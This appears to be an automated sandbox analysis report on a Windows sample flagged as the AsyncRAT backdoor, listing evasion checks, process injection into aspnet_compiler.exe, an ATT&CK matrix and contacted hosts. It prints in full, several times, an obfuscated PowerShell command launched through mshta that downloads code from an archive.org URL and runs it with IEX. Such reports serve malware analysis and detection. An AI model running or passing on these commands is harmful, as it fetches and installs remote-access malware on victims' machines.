          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2220Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2220Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6532Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6532Thread sleep count: 34 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6540Thread sleep count: 6909 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6540Thread sleep count: 2765 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: powershell.exe, 00000003.00000002.484716510.0000027D9FCE0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.477044465.00000000054D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: aspnet_compiler.exe, 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmpBinary or memory string: vmware
          Source: aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000003.00000002.484716510.0000027D9FCE0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.477044465.00000000054D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: powershell.exe, 00000003.00000002.484716510.0000027D9FCE0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.477044465.00000000054D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: powershell.exe, 00000003.00000002.484716510.0000027D9FCE0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.477044465.00000000054D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Injects a PE file into a foreign processesShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 40E000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 410000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 923008Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 404000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 406000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: DA9008Jump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X Jump to behavior
          Source: powershell.exe, 00000003.00000002.470709255.0000027D85B90000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.471299747.0000000002C3C000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000019.00000002.469212629.00000000018D0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: powershell.exe, 00000003.00000002.470709255.0000027D85B90000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470083278.00000000014C0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000019.00000002.469212629.00000000018D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: powershell.exe, 00000003.00000002.470709255.0000027D85B90000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470083278.00000000014C0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000019.00000002.469212629.00000000018D0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: powershell.exe, 00000003.00000002.470709255.0000027D85B90000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470083278.00000000014C0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000019.00000002.469212629.00000000018D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeQueries volume information: C:\Users\user\Desktop\xGrfj8RvYg.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Yara detected AsyncRATShow sources
          Source: Yara matchFile source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara matchFile source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsCommand and Scripting Interpreter11Scheduled Task/Job1Process Injection212Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery14Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsScheduled Task/Job1Registry Run Keys / Startup Folder1Scheduled Task/Job1Obfuscated Files or Information11Security Account ManagerQuery Registry1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Software Packing1NTDSSecurity Software Discovery121Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsVirtualization/Sandbox Evasion31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion31Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection212/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          xGrfj8RvYg.exe9%ReversingLabsByteCode-MSIL.Backdoor.Crysan

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          23.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
          23.0.aspnet_compiler.exe.400000.0.unpack100%AviraHEUR/AGEN.1121262Download File
          25.2.aspnet_compiler.exe.400000.0.unpack100%AviraHEUR/AGEN.1137914Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://crl.microsoft0%URL Reputationsafe
          http://crl.microsoft0%URL Reputationsafe
          http://crl.microsoft0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://ia601406.us.archive.org80%Avira URL Cloudsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://ia803408.us.archive.orgx0%Avira URL Cloudsafe
          http://crl.goi0%Avira URL Cloudsafe
          https://archive.orgx0%Avira URL Cloudsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://microsoft.co0%URL Reputationsafe
          http://microsoft.co0%URL Reputationsafe
          http://microsoft.co0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://ia601406.us.archive.orgx0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ia601406.us.archive.org
          		207.241.227.126
          		truefalse
            		high
            ia601509.us.archive.org
            		207.241.227.119
            		truefalse
              		high
              archive.org
              		207.241.224.2
              		truefalse
                		high
                ia601502.us.archive.org
                		207.241.227.112
                		truefalse
                  		high
                  ia803408.us.archive.org
                  		207.241.232.198
                  		truefalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ia601509.us.archive.org/powershell.exe, 00000003.00000003.210047788.0000027D9F8AB000.00000004.00000001.sdmpfalse
                      		high
                      https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt...7lmshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmpfalse
                        		high
                        http://crl.microsoftpowershell.exe, 00000003.00000002.484556145.0000027D9F8E4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://ia803408.us.archive.orgpowershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpfalse
                          		high
                          http://certificates.godaddy.com/repository/0mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpfalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt...mshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmpfalse
                              		high
                              https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt1mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpfalse
                                		high
                                https://ia601406.us.archive.org8powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
